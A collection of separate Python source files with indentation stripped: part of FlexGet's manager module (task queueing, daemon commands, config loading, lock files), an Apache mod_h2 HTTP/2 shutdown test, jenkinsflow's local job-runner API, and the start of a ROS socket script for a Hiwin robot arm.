logger.error('Reloading config failed: {}', e)
# Handle --tasks
if options.tasks:
# Consider * the same as not specifying tasks at all (makes sure manual plugin still works)
if options.tasks == ['*']:
options.tasks = None
else:
# Create list of tasks to run, preserving order
task_names = []
for arg in options.tasks:
matches = [
t for t in self.tasks if fnmatch.fnmatchcase(str(t).lower(), arg.lower())
]
if not matches:
msg = f'`{arg}` does not match any tasks'
logger.error(msg)
continue
task_names.extend(m for m in matches if m not in task_names)
# Set the option as a list of matching task names so plugins can use it easily
options.tasks = task_names
# TODO: 1.2 This is a hack to make task priorities work still, not sure if it's the best one
task_names = sorted(
task_names, key=lambda t: self.config['tasks'][t].get('priority', 65535)
)
finished_events = []
for task_name in task_names:
task = Task(
self,
task_name,
options=options,
output=get_console_output(),
session_id=flexget.log.get_log_session_id(),
priority=priority,
suppress_warnings=suppress_warnings,
)
self.task_queue.put(task)
finished_events.append((task.id, task.name, task.finished_event))
return finished_events
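# Hypothetical usage sketch (not part of the original module), matching the
# return shape documented above:
#
#   finished = manager.execute(options={'tasks': ['my-task']})
#   for task_id, task_name, event in finished:
#       event.wait()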
def start(self) -> None:
"""
Starting point when executing from commandline, dispatch execution to correct destination.
If there is a FlexGet process with an ipc server already running, the command will be sent there for execution
and results will be streamed back.
If not, this will attempt to obtain a lock, initialize the manager, and run the command here.
"""
# When we are in test mode, we use a different lock file and db
if self.options.test:
self.lockfile = os.path.join(self.config_base, '.test-%s-lock' % self.config_name)
# If another process is started, send the execution to the running process
ipc_info = self.check_ipc_info()
# If we are connecting to a running daemon, we don't want to log to the log file,
# the daemon is already handling that.
self._init_logging(to_file=not ipc_info)
if ipc_info:
console(
'There is a FlexGet process already running for this config, sending execution there.'
)
logger.debug('Sending command to running FlexGet process: {}', self.args)
try:
client = IPCClient(ipc_info['port'], ipc_info['password'])
except ValueError as e:
logger.error(e)
else:
try:
client.handle_cli(self.args)
except KeyboardInterrupt:
logger.error(
'Disconnecting from daemon due to ctrl-c. Executions will still continue in the '
'background.'
)
except EOFError:
logger.error('Connection from daemon was severed.')
return
if self.options.test:
logger.info('Test mode, creating a copy from database ...')
db_test_filename = os.path.join(self.config_base, 'test-%s.sqlite' % self.config_name)
if os.path.exists(self.db_filename):
shutil.copy(self.db_filename, db_test_filename)
logger.info('Test database created')
self.db_filename = db_test_filename
# No running process, we start our own to handle command
with self.acquire_lock():
self.initialize()
self.handle_cli()
self._shutdown()
def handle_cli(self, options: Optional[argparse.Namespace] = None) -> None:
"""
Dispatch a cli command to the appropriate function.
* :meth:`.execute_command`
* :meth:`.daemon_command`
* CLI plugin callback function
The manager should have a lock and be initialized before calling this method.
:param options: argparse options for command. Defaults to options that manager was instantiated with.
"""
if not options:
options = self.options
command = options.cli_command
if command is None:
raise Exception('Command missing')
command_options = getattr(options, command)
# First check for built-in commands
if command in ['execute', 'daemon']:
if command == 'execute':
self.execute_command(command_options)
elif command == 'daemon':
self.daemon_command(command_options)
else:
# Otherwise dispatch the command to the callback function
options.cli_command_callback(self, command_options)
def execute_command(self, options: argparse.Namespace) -> None:
"""
Handles the 'execute' CLI command.
If there is already a task queue running in this process, adds the execution to the queue.
If FlexGet is being invoked with this command, starts up a task queue and runs the execution.
Fires events:
* manager.execute.started
* manager.execute.completed
:param options: argparse options
"""
fire_event('manager.execute.started', self, options)
if self.task_queue.is_alive() or self.is_daemon:
if not self.task_queue.is_alive():
logger.error(
'Task queue has died unexpectedly. Restarting it. Please open an issue on Github and include'
' any previous error logs.'
)
self.task_queue = TaskQueue()
self.task_queue.start()
if len(self.task_queue):
logger.verbose('There is a task already running, execution queued.')
finished_events = self.execute(options)
if not options.cron:
# Wait until execution of all tasks has finished
for _, _, event in finished_events:
event.wait()
else:
self.task_queue.start()
self.ipc_server.start()
self.execute(options)
self.shutdown(finish_queue=True)
self.task_queue.wait()
fire_event('manager.execute.completed', self, options)
def daemon_command(self, options: argparse.Namespace) -> None:
"""
Handles the 'daemon' CLI command.
Fires events:
* manager.daemon.started
* manager.daemon.completed
:param options: argparse options
"""
# Import API so it can register to daemon.started event
if options.action == 'start':
if self.is_daemon:
logger.error('Daemon already running for this config.')
return
elif self.task_queue.is_alive():
logger.error(
'Non-daemon execution of FlexGet is running. Cannot start daemon until it is finished.'
)
return
if options.daemonize:
self.daemonize()
if options.autoreload_config:
self.autoreload_config = True
try:
signal.signal(signal.SIGTERM, self._handle_sigterm)
except ValueError as e:
# If flexget is being called from another script, e.g. windows service helper, and we are not the
# main thread, this error will occur.
logger.debug('Error registering sigterm handler: {}', e)
self.is_daemon = True
def run_daemon(tray_icon: Optional['TrayIcon'] = None):
fire_event('manager.daemon.started', self)
self.task_queue.start()
self.ipc_server.start()
self.task_queue.wait()
fire_event('manager.daemon.completed', self)
if tray_icon:
tray_icon.stop()
if options.tray_icon:
from flexget.tray_icon import tray_icon # noqa
self._add_tray_icon_items(tray_icon)
# Tray icon must be run in the main thread.
m = threading.Thread(target=run_daemon, args=(tray_icon,))
m.start()
tray_icon.run()
m.join()
else:
run_daemon()
elif options.action in ['stop', 'reload-config', 'status']:
if not self.is_daemon:
logger.error('There does not appear to be a daemon running.')
return
if options.action == 'status':
logger.info('Daemon running. (PID: {})', os.getpid())
elif options.action == 'stop':
tasks = (
'all queued tasks (if any) have'
if options.wait
else 'currently running task (if any) has'
)
logger.info(
'Daemon shutdown requested. Shutdown will commence when {} finished executing.',
tasks,
)
self.shutdown(options.wait)
elif options.action == 'reload-config':
logger.info('Reloading config from disk.')
try:
self.load_config()
except ValueError as e:
logger.error('Error loading config: {}', e.args[0])
else:
logger.info('Config successfully reloaded from disk.')
def _handle_sigterm(self, signum, frame) -> None:
logger.info('Got SIGTERM. Shutting down.')
self.shutdown(finish_queue=False)
def setup_yaml(self) -> None:
"""Sets up the yaml loader to return unicode objects for strings by default"""
def construct_yaml_str(self, node):
# Override the default string handling function
# to always return unicode objects
return self.construct_scalar(node)
yaml.Loader.add_constructor(u'tag:yaml.org,2002:str', construct_yaml_str)
yaml.SafeLoader.add_constructor(u'tag:yaml.org,2002:str', construct_yaml_str)
# Set up the dumper to not tag every string with !!python/unicode
def unicode_representer(dumper, uni):
node = yaml.ScalarNode(tag=u'tag:yaml.org,2002:str', value=uni)
return node
yaml.add_representer(str, unicode_representer)
# Set up the dumper to increase the indent for lists
def increase_indent_wrapper(func):
def increase_indent(self, flow=False, indentless=False):
func(self, flow, False)
return increase_indent
yaml.Dumper.increase_indent = increase_indent_wrapper(yaml.Dumper.increase_indent)
yaml.SafeDumper.increase_indent = increase_indent_wrapper(yaml.SafeDumper.increase_indent)
def _init_config(self, create: bool = False) -> None:
"""
Find and load the configuration file.
:param bool create: If a config file is not found, and create is True, one will be created in the home folder
:raises: `IOError` when no config file could be found, and `create` is False.
"""
home_path = os.path.join(os.path.expanduser('~'), '.flexget')
options_config = os.path.expanduser(self.options.config)
possible = []
if os.path.isabs(options_config):
# explicit path given, don't try anything
config = options_config
possible = [config]
else:
logger.debug('Figuring out config load paths')
try:
possible.append(os.getcwd())
except OSError:
logger.debug('current directory invalid, not searching for config there')
# for virtualenv / dev sandbox
if hasattr(sys, 'real_prefix'):
logger.debug('Adding virtualenv path')
possible.append(sys.prefix)
# normal lookup locations
possible.append(home_path)
if sys.platform.startswith('win'):
# On windows look in ~/flexget as well, as explorer does not let you create a folder starting with a dot
home_path = os.path.join(os.path.expanduser('~'), 'flexget')
possible.append(home_path)
else:
# The freedesktop.org standard config location
xdg_config = os.environ.get(
'XDG_CONFIG_HOME', os.path.join(os.path.expanduser('~'), '.config')
)
possible.append(os.path.join(xdg_config, 'flexget'))
for path in possible:
config = os.path.join(path, options_config)
if os.path.exists(config):
logger.debug('Found config: {}', config)
break
else:
config = None
if create and not (config and os.path.exists(config)):
config = os.path.join(home_path, options_config)
logger.info('Config file {} not found. Creating new config {}', options_config, config)
with open(config, 'w') as newconfig:
# Write empty tasks to the config
newconfig.write(yaml.dump({'tasks': {}}))
elif not config:
logger.critical('Failed to find configuration file {}', options_config)
logger.info('Tried to read from: {}', ', '.join(possible))
raise IOError('No configuration file found.')
if not os.path.isfile(config):
raise IOError('Config `%s` does not appear to be a file.' % config)
logger.debug('Config file {} selected', config)
self.config_path = config
self.config_name = os.path.splitext(os.path.basename(config))[0]
self.config_base = os.path.normpath(os.path.dirname(config))
self.lockfile = os.path.join(self.config_base, '.%s-lock' % self.config_name)
self.db_filename = os.path.join(self.config_base, 'db-%s.sqlite' % self.config_name)
def hash_config(self) -> Optional[str]:
if not self.config_path:
return
sha1_hash = hashlib.sha1()
with io.open(self.config_path, 'rb') as f:
while True:
data = f.read(65536)
if not data:
break
sha1_hash.update(data)
return sha1_hash.hexdigest()
def load_config(
self, output_to_console: bool = True, config_file_hash: Optional[str] = None
) -> None:
"""
Loads the config file from disk, validates and activates it.
:raises: `ValueError` if there is a problem loading the config file
"""
fire_event('manager.before_config_load', self)
with io.open(self.config_path, 'r', encoding='utf-8') as f:
try:
raw_config = f.read()
except UnicodeDecodeError:
logger.critical('Config file must be UTF-8 encoded.')
raise ValueError('Config file is not UTF-8 encoded')
try:
self.config_file_hash = config_file_hash or self.hash_config()
config = yaml.safe_load(raw_config) or {}
except Exception as e:
msg = str(e).replace('\n', ' ')
msg = ' '.join(msg.split())
logger.critical(msg)
if output_to_console:
print('')
print('-' * 79)
print(' Malformed configuration file (check messages above). Common reasons:')
print('-' * 79)
print('')
print(' o Indentation error')
print(' o Missing : from end of the line')
print(' o Non ASCII characters (use UTF8)')
print(
' o If text contains any of :[]{}% characters it must be single-quoted '
'(eg. value{1} should be \'value{1}\')\n'
)
# Not very good practice, but several kinds of exceptions can occur here
# (at least yaml ReaderError and ScannerError), so we duck-type the attributes instead
if (
hasattr(e, 'problem')
and hasattr(e, 'context_mark')
and hasattr(e, 'problem_mark')
):
lines = 0
if e.problem is not None:
print(' Reason: %s\n' % e.problem)
if e.problem == 'mapping values are not allowed here':
print(' ----> MOST LIKELY REASON: Missing : from end of the line!')
print('')
if e.context_mark is not None:
print(
' Check configuration near line %s, column %s'
% (e.context_mark.line, e.context_mark.column)
)
lines += 1
if e.problem_mark is not None:
print(
' Check configuration near line %s, column %s'
% (e.problem_mark.line, e.problem_mark.column)
)
lines += 1
if lines:
print('')
if lines == 1:
print(' Fault is almost always in this or previous line\n')
if lines == 2:
print(' Fault is almost always in one of these lines or previous ones\n')
# When --debug escalate to full stacktrace
if self.options.debug or not output_to_console:
raise
raise ValueError('Config file is not valid YAML')
# config loaded successfully
logger.debug('config_name: {}', self.config_name)
logger.debug('config_base: {}', self.config_base)
# Install the newly loaded config
self.update_config(config)
def update_config(self, config: dict) -> None:
"""
Provide a new config for the manager to use.
:raises: `ValueError` and rolls back to previous config if the provided config is not valid.
"""
new_user_config = config
old_config = self.config
try:
self.config = self.validate_config(config)
except ValueError as e:
for error in getattr(e, 'errors', []):
logger.critical('[{}] {}', error.json_pointer, error.message)
logger.debug('invalid config, rolling back')
self.config = old_config
raise
logger.debug('New config data loaded.')
self.user_config = copy.deepcopy(new_user_config)
fire_event('manager.config_updated', self)
def backup_config(self) -> str:
backup_path = os.path.join(
self.config_base,
'%s-%s.bak' % (self.config_name, datetime.now().strftime('%y%m%d%H%M%S')),
)
logger.debug('backing up old config to {} before new save', backup_path)
try:
shutil.copy(self.config_path, backup_path)
except (OSError, IOError) as e:
logger.warning('Config backup creation failed: {}', str(e))
raise
return backup_path
def save_config(self) -> None:
"""Dumps current config to yaml config file"""
# TODO: Only keep x number of backups..
# Back up the user's current config before overwriting
try:
self.backup_config()
except (OSError, IOError):
return
with open(self.config_path, 'w') as config_file:
config_file.write(yaml.dump(self.user_config, default_flow_style=False))
def config_changed(self) -> None:
"""Makes sure that all tasks will have the config_modified flag come out true on the next run.
Useful when changing the db and all tasks need to be completely reprocessed."""
from flexget.task import config_changed
config_changed()
fire_event('manager.config_updated', self)
def validate_config(self, config: Optional[dict] = None) -> dict:
"""
Check all root level keywords are valid. Config may be modified by before_config_validate hooks. Modified
config will be returned.
:param config: Config to check. If not provided, current manager config will be checked.
:raises: `ValueError` when config fails validation. There will be an `errors` attribute with the schema errors.
:returns: Final validated config.
"""
if not config:
config = self.config
config = fire_event('manager.before_config_validate', config, self)
errors = config_schema.process_config(config)
if errors:
err = ValueError('Did not pass schema validation.')
err.errors = errors
raise err
else:
return config
def init_sqlalchemy(self) -> None:
"""Initialize SQLAlchemy"""
try:
if [int(part) for part in sqlalchemy.__version__.split('.')] < [0, 7, 0]:
print(
'FATAL: SQLAlchemy 0.7.0 or newer required. Please upgrade your SQLAlchemy.',
file=sys.stderr,
)
sys.exit(1)
except ValueError as e:
logger.critical('Failed to check SQLAlchemy version, you may need to upgrade it')
# SQLAlchemy
if self.database_uri is None:
# in case running on windows, needs double \\
filename = self.db_filename.replace('\\', '\\\\')
self.database_uri = 'sqlite:///%s' % filename
if self.db_filename and not os.path.exists(self.db_filename):
logger.verbose('Creating new database {} - DO NOT INTERRUPT ...', self.db_filename)
# fire up the engine
logger.debug('Connecting to: {}', self.database_uri)
try:
self.engine = sqlalchemy.create_engine(
self.database_uri,
echo=self.options.debug_sql,
connect_args={'check_same_thread': False, 'timeout': 10},
)
except ImportError as e:
print(
'FATAL: Unable to use SQLite. Are you running Python 2.7, 3.3 or newer?\n'
'Python should normally have SQLite support built in.\n'
'If you\'re running the correct version of Python, then it was built without SQLite.\n'
'You can try installing `pysqlite`. If you have compiled python yourself, '
'recompile it with SQLite support.\n'
'Error: %s' % e,
file=sys.stderr,
)
sys.exit(1)
Session.configure(bind=self.engine)
# create all tables, doesn't do anything to existing tables
try:
Base.metadata.create_all(bind=self.engine)
except OperationalError as e:
if os.path.exists(self.db_filename):
print(
'%s - make sure you have write permissions to file %s'
% (e.message, self.db_filename),
file=sys.stderr,
)
else:
print(
'%s - make sure you have write permissions to directory %s'
% (e.message, self.config_base),
file=sys.stderr,
)
raise
def _read_lock(self) -> Optional[dict]:
"""
Read the values from the lock file. Returns None if there is no current lock file.
"""
if self.lockfile and os.path.exists(self.lockfile):
result = {}
with io.open(self.lockfile, encoding='utf-8') as f:
lines = [l for l in f.readlines() if l]
for line in lines:
try:
key, value = line.split(':', 1)
except ValueError:
logger.debug('Invalid line in lock file: {}', line)
continue
result[key.strip().lower()] = value.strip()
for key in result:
if result[key].isdigit():
result[key] = int(result[key])
result.setdefault('pid', None)
if not result['pid']:
logger.error(
'Invalid lock file. Make sure FlexGet is not running, then delete it.'
)
elif not pid_exists(result['pid']):
return None
return result
return None
def check_lock(self) -> bool:
"""Returns True if there is a lock on the database."""
lock_info = self._read_lock()
if not lock_info:
return False
# Don't count it if we hold the lock
if os.getpid() == lock_info['pid']:
return False
return True
def check_ipc_info(self) -> Optional[dict]:
"""If a daemon has a lock on the database, return info to connect to IPC."""
lock_info = self._read_lock()
if lock_info and 'port' in lock_info:
return lock_info
return None
@contextmanager
def acquire_lock(self, event: bool = True) -> Iterator:
"""
:param bool event: If True, the 'manager.lock_acquired' event will be fired after a lock is obtained
"""
acquired = False
try:
# Don't do anything if we already have a lock. This means only the outermost call will release the lock file
if not self._has_lock:
# Exit if there is an existing lock.
if self.check_lock():
with io.open(self.lockfile, encoding='utf-8') as f:
pid = f.read()
print(
'Another process (%s) is running, will exit.' % pid.split('\n')[0],
file=sys.stderr,
)
print(
'If you\'re sure there is no other instance running, delete %s'
% self.lockfile,
file=sys.stderr,
)
sys.exit(1)
self._has_lock = True
self.write_lock()
acquired = True
if event:
fire_event('manager.lock_acquired', self)
yield
finally:
if acquired:
self.release_lock()
self._has_lock = False
def write_lock(self, ipc_info: Optional[dict] = None) -> None:
assert self._has_lock
with io.open(self.lockfile, 'w', encoding='utf-8') as f:
f.write('PID: %s\n' % os.getpid())
if ipc_info:
for key in sorted(ipc_info):
f.write('%s: %s\n' % (key, ipc_info[key]))
def release_lock(self) -> None:
try:
os.remove(self.lockfile)
except OSError as e:
if e.errno != errno.ENOENT:
raise
logger.debug('Lockfile {} not found', self.lockfile)
else:
logger.debug('Removed {}', self.lockfile)
def daemonize(self) -> None:
"""Daemonizes the current process. Returns the new pid"""
if sys.platform.startswith('win'):
logger.error('Cannot daemonize on windows')
return
if threading.activeCount() != 1:
logger.critical(
'There are {!r} active threads. Daemonizing now may cause strange failures.',
threading.enumerate(),
)
logger.info('Daemonizing...')
try:
pid = os.fork()
if pid > 0:
# Don't run the exit handlers on the parent
atexit._exithandlers = []
# exit first parent
sys.exit(0)
except OSError as e:
sys.stderr.write('fork #1 failed: %d (%s)\n' % (e.errno, e.strerror))
sys.exit(1)
# decouple from parent environment
os.chdir('/')
os.setsid()
os.umask(0)
# do second fork
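# (a second fork prevents the daemon from ever re-acquiring a controlling terminal)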
try:
pid = os.fork()
if pid > 0:
# Don't run the exit handlers on the parent
atexit._exithandlers = []
# exit from second parent
sys.exit(0)
except OSError as e:
sys.stderr.write('fork #2 failed: %d (%s)\n' % (e.errno, e.strerror))
sys.exit(1)
logger.info('Daemonize complete. New PID: {}', os.getpid())
# redirect standard file descriptors
sys.stdout.flush()
sys.stderr.flush()
si = open(os.devnull, 'r')
so = open(os.devnull, 'ab+')
se = open(os.devnull, 'ab+', 0)
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
# If we have a lock, update the lock file with our new pid
if self._has_lock:
self.write_lock()
def db_cleanup(self, force: bool = False) -> None:
"""
Perform database cleanup if cleanup interval has been met.
Fires events:
* manager.db_cleanup
If interval was met. Gives session to do the cleanup as a parameter.
:param bool force: Run the cleanup no matter whether the interval has been met.
"""
expired = (
self.persist.get('last_cleanup', datetime(1900, 1, 1))
< datetime.now() - DB_CLEANUP_INTERVAL
)
if force or expired:
logger.info('Running database cleanup.')
with Session() as session:
fire_event('manager.db_cleanup', self, session)
# Try to VACUUM after cleanup
fire_event('manager.db_vacuum', self)
# Just in case some plugin was overzealous in its cleaning, mark the config changed
self.config_changed()
self.persist['last_cleanup'] = datetime.now()
else:
logger.debug('Not running db cleanup, last run {}', self.persist.get('last_cleanup'))
def shutdown(self, finish_queue: bool = True) -> None:
"""
Request manager shutdown.
:param bool finish_queue: Should scheduler finish the task queue
"""
if not self.initialized:
raise RuntimeError('Cannot shutdown manager that was never initialized.')
fire_event('manager.shutdown_requested', self)
self.task_queue.shutdown(finish_queue)
def _shutdown(self) -> None:
"""Runs when the manager is done processing everything."""
if self.ipc_server:
self.ipc_server.shutdown()
fire_event('manager.shutdown', self)
if not self.unit_test: # don't scroll "nosetests" summary results when logging is enabled
logger.debug('Shutting down')
self.engine.dispose()
# remove temporary database used in test mode
if self.options.test:
if 'test' not in self.db_filename:
raise Exception('trying to delete non test database?')
if self._has_lock:
os.remove(self.db_filename)
logger.info('Removed test database')
global manager
manager = None
def crash_report(self) -> str:
"""
This should be called when handling an unexpected exception. Will create a new log file containing the last 50
debug messages as well as the crash traceback.
"""
if not self.unit_test:
log_dir = os.path.dirname(self.log_filename)
filename = os.path.join(
log_dir, datetime.now().strftime('crash_report.%Y.%m.%d.%H%M%S%f.log')
)
with codecs.open(filename, 'w', encoding='utf-8') as outfile:
outfile.writelines(flexget.log.debug_buffer)
traceback.print_exc(file=outfile)
logger.critical(
'An unexpected crash has occurred. Writing crash report to {}. '
'Please verify you are running the latest version of flexget by using "flexget -V" '
'from CLI or by using version_checker plugin'
' at http://flexget.com/wiki/Plugins/version_checker. '
'You are currently using version {}',
filename,
get_current_flexget_version(),
)
logger.opt(exception=True).debug('Traceback:')
return traceback.format_exc()
|
test_106_shutdown.py
|
#
# mod-h2 test suite
# check HTTP/2 behaviour when the server is reloaded/shut down mid-request
#
import time
from threading import Thread
import pytest
from .env import H2Conf
from pyhttpd.result import ExecResult
class TestShutdown:
@pytest.fixture(autouse=True, scope='class')
def _class_scope(self, env):
conf = H2Conf(env)
conf.add_vhost_cgi()
conf.install()
assert env.apache_restart() == 0
def test_h2_106_01(self, env):
url = env.mkurl("https", "cgi", "/necho.py")
lines = 100000
text = "123456789"
wait2 = 1.0
self.r = None
def long_request():
args = ["-vvv",
"-F", f"count={lines}",
"-F", f"text={text}",
"-F", f"wait2={wait2}",
]
self.r = env.curl_get(url, 5, options=args)
t = Thread(target=long_request)
t.start()
time.sleep(0.5)
assert env.apache_reload() == 0
t.join()
# noinspection PyTypeChecker
r: ExecResult = self.r
assert r.response["status"] == 200
assert len(r.response["body"]) == (lines * (len(text)+1))
|
script_api.py
|
# Copyright (c) 2012 - 2015 Lars Hupfeldt Nielsen, Hupfeldt IT
# All rights reserved. This work is under a BSD license, see LICENSE.TXT.
import sys, os, shutil, importlib, datetime, tempfile, psutil, setproctitle, signal, errno
from os.path import join as jp
import multiprocessing
import urllib.parse
from .api_base import BuildResult, Progress, UnknownJobException, BaseApiMixin, ApiInvocationMixin
from .speed import Speed
here = os.path.abspath(os.path.dirname(__file__))
def _mkdir(path):
try:
os.mkdir(path)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
def _pgrep(proc_name):
"""Returns True if a process with name 'proc_name' is running, else False"""
try:
for proc in psutil.process_iter():
if proc_name == proc.name():
return True
except psutil.NoSuchProcess:
return False
return False
class LoggingProcess(multiprocessing.Process):
proc_name_prefix = "jenkinsflow_script_api_"
def __init__(self, group=None, target=None, output_file_name=None, workspace=None, name=None, args=(), env=None):
self.user_target = target
super().__init__(group=group, target=self.run_job_wrapper, name=name, args=args)
self.output_file_name = output_file_name
self.workspace = workspace
self.env = env
self._build_res_unstable = False
def run_job_wrapper(self, *args):
setproctitle.setproctitle(self.proc_name_prefix + self.name)
# Set signalhandler for changing job result
def set_result(_sig, _frame):
print("\nGot SIGUSR1: Changing result to 'unstable'")
self._build_res_unstable = True
signal.signal(signal.SIGUSR1, set_result)
os.chdir(self.workspace)
os.environ.update(self.env)
os.environ['EXECUTOR_NUMBER'] = repr(self.pid)
try:
rc = self.user_target(*args)
except Exception as ex: # pylint: disable=broad-except
print("jenkinsflow.script_api: Caught exception from job script:", ex)
rc = 1
if self._build_res_unstable:
sys.exit(2)
sys.exit(rc)
def run(self):
sys.stdout = sys.stderr = open(self.output_file_name, 'w', buffering=1)
super().run()
class Jenkins(Speed, BaseApiMixin):
"""Optimized minimal set of methods needed for jenkinsflow to directly execute python code instead of invoking Jenkins jobs.
THIS DOES NOT SUPPORT CONCURRENT INVOCATIONS OF FLOW
There is no concept of job queues or executors, so if your flow depends on these for correctness, you will experience different behaviour
when using this api instead of the real Jenkins.
Args:
direct_uri (str): Path to dir with 'job' method python modules. Modules named <job-name>.py will be imported from this directory.
If no module exists for a specific jobname, the module called 'default.py' will be imported.
The modules must contain a function called 'run_job' with the following signature:
run_job(job_name, job_prefix_filter, username, password, securitytoken, cause, build_params)
A return value of 0 is 'SUCCESS'
A return value of 1 or any exception raised is 'FAILURE'
Any other return value means 'UNSTABLE'
job_prefix_filter (str): Passed to 'run_job'. ``jenkinsflow`` puts no meaning into this parameter.
username (str): Passed to 'run_job'. ``jenkinsflow`` puts no meaning into this parameter.
password (str): Passed to 'run_job'. ``jenkinsflow`` puts no meaning into this parameter.
invocation_class (class): Defaults to `Invocation`.
log_dir (str): Directory in which to store logs. Defaults to subdirectory 'jenkinsflow' under the system defined tmp dir.
**kwargs: Ignored for compatibility with the other jenkins apis
"""
def __init__(self, direct_uri, job_prefix_filter=None, username=None, password=None, invocation_class=None, log_dir=None, **kwargs):
self.job_prefix_filter = job_prefix_filter
self.username = username
self.password = password
self.public_uri = direct_uri
self.log_dir = log_dir or os.path.join(tempfile.gettempdir(), 'jenkinsflow')
self.invocation_class = invocation_class or Invocation
self.jenkins_prefix = urllib.parse.urlsplit(direct_uri).path # If direct_uri is a path, then jenkins_prefix will be the same as direct_uri
self.jobs = {}
def poll(self):
pass
def quick_poll(self):
pass
def queue_poll(self):
pass
def _script_file(self, job_name):
return jp(self.public_uri, job_name + '.py')
def _workspace(self, job_name):
return jp(self.public_uri, job_name.replace('/', '_'))
def get_job(self, name):
job = self.jobs.get(name)
if not job:
script_file = script_file1 = self._script_file(name)
if not os.path.exists(script_file):
script_file = self._script_file('default')
if not os.path.exists(script_file):
raise UnknownJobException(script_file1 + ' or ' + script_file)
script_dir = os.path.dirname(script_file)
if script_dir not in sys.path:
sys.path.append(script_dir)
try:
user_module = importlib.import_module(os.path.basename(script_file).replace('.py', ''), package=None)
except (ImportError, SyntaxError) as ex:
raise UnknownJobException(repr(script_file) + ' ' + repr(ex)) from ex
try:
func = user_module.run_job
except AttributeError as ex:
raise UnknownJobException(script_file + repr(ex)) from ex
job = self.jobs[name] = ApiJob(jenkins=self, name=name, script_file=script_file, workspace=self._workspace(name), func=func)
return job
def create_job(self, job_name, config_xml):
script_file = self._script_file(job_name)
_mkdir(os.path.dirname(script_file))
with open(script_file, 'w') as ff:
ff.write(config_xml)
def delete_job(self, job_name):
script_file = self._script_file(job_name)
try:
os.unlink(script_file)
except OSError as ex:
if not os.path.exists(script_file):
raise UnknownJobException(script_file + repr(ex)) from ex
raise
try:
shutil.rmtree(self._workspace(job_name))
except OSError:
# Ignore if the workspace was never created; re-raise if deletion actually failed
if os.path.exists(self._workspace(job_name)):
raise
def set_build_description(
self, description: str, replace: bool = False, separator: str = '\n',
build_url: str = None, job_name: str = None, build_number: int = None):
"""Utility to set/append build description. :py:obj:`description` will be written to a file in the workspace.
Args:
description: The description to set on the build.
replace: If True, replace any existing description; otherwise append to it.
separator: A separator to insert between any existing description and the new :py:obj:`description` when appending.
build_url:
job_name:
build_number:
"""
rel_build_url = self.get_build_url(build_url, job_name, build_number)
# TODO: Is this always correct?
workspace = self._workspace(os.path.basename(os.path.dirname(rel_build_url).replace('.py', '')))
mode = 'w' if replace else 'a'
fname = jp(workspace, 'description.txt')
if not replace and os.path.exists(fname) and os.stat(fname).st_size:
description = separator + description
with open(fname, mode) as ff:
try:
ff.write(description)
except UnicodeEncodeError:
ff.write(description.encode('utf-8'))
class ApiJob():
def __init__(self, jenkins, name, script_file, workspace, func):
self.jenkins = jenkins
self.name = name
self.build = None
self.public_uri = script_file
self.workspace = workspace
self.func = func
self.log_file = jp(self.jenkins.log_dir, self.name + '.log')
self.build_num = None
self._invocations = []
self.queued_why = None
self.old_build_number = None
def invoke(self, securitytoken, build_params, cause, description):
_mkdir(self.jenkins.log_dir)
_mkdir(self.workspace)
build_number = (self.build_num or 0) + 1
self.build_num = build_number
fixed_args = [self.name, self.jenkins.job_prefix_filter, self.jenkins.username, self.jenkins.password, securitytoken, cause]
fixed_args.append(build_params if build_params else {})
# Export some of the same variables that Jenkins does
extra_env = dict(
BUILD_NUMBER=repr(build_number),
BUILD_ID=datetime.datetime.isoformat(datetime.datetime.utcnow()),
BUILD_DISPLAY_NAME='#' + repr(build_number),
JOB_NAME=self.name,
BUILD_TAG='jenkinsflow-' + self.name + '-' + repr(build_number),
NODE_NAME='master',
NODE_LABELS='',
WORKSPACE=self.workspace,
JENKINS_HOME=self.jenkins.public_uri,
JENKINS_URL=self.jenkins.public_uri,
HUDSON_URL=self.jenkins.public_uri,
BUILD_URL=jp(self.public_uri, repr(build_number)),
JOB_URL=self.public_uri,
)
proc = LoggingProcess(target=self.func, output_file_name=self.log_file, workspace=self.workspace, name=self.name, args=fixed_args, env=extra_env)
self.build = self.jenkins.invocation_class(self, proc, build_number)
if description:
self.jenkins.set_build_description(description, replace=True, separator='', job_name=self.name, build_number=build_number)
self._invocations.append(self.build)
return self.build
def poll(self):
pass
def job_status(self):
"""Result, progress and latest buildnumber info for the JOB NOT the invocation
Return (result, progress_info, latest_build_number) (str, str, int or None):
Note: Always returns result == BuildResult.UNKNOWN and latest_build_number == 0
"""
progress = Progress.RUNNING if _pgrep(LoggingProcess.proc_name_prefix + self.name) else Progress.IDLE
result = BuildResult.UNKNOWN
return (result, progress, 0)
def stop_all(self):
# TODO stop ALL
if self.build:
self.build.proc.terminate()
def update_config(self, config_xml):
_mkdir(os.path.dirname(self.public_uri))
with open(self.public_uri, 'w') as ff:
ff.write(config_xml)
def __repr__(self):
return str(self.name)
class Invocation(ApiInvocationMixin):
def __init__(self, job, proc, build_number):
self.job = job
self.proc = proc
self.build_number = build_number
self.queued_why = None
self.proc.start()
def status(self):
if self.proc.is_alive():
return (BuildResult.UNKNOWN, Progress.RUNNING)
rc = self.proc.exitcode
if rc == 0:
return (BuildResult.SUCCESS, Progress.IDLE)
if rc == 1:
return (BuildResult.FAILURE, Progress.IDLE)
return (BuildResult.UNSTABLE, Progress.IDLE)
def stop(self, dequeue): # pylint: disable=unused-argument
self.proc.terminate()
def console_url(self):
return self.job.log_file
def __repr__(self):
return self.job.name + " #" + repr(self.build_number)
|
Hiwin_RT605_ArmCommand_Socket_20190627185330.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
## multithreading
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
Socket = 0
data = '0' # initial value for transmitted data
Arm_feedback = 1 # assume the arm is busy
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
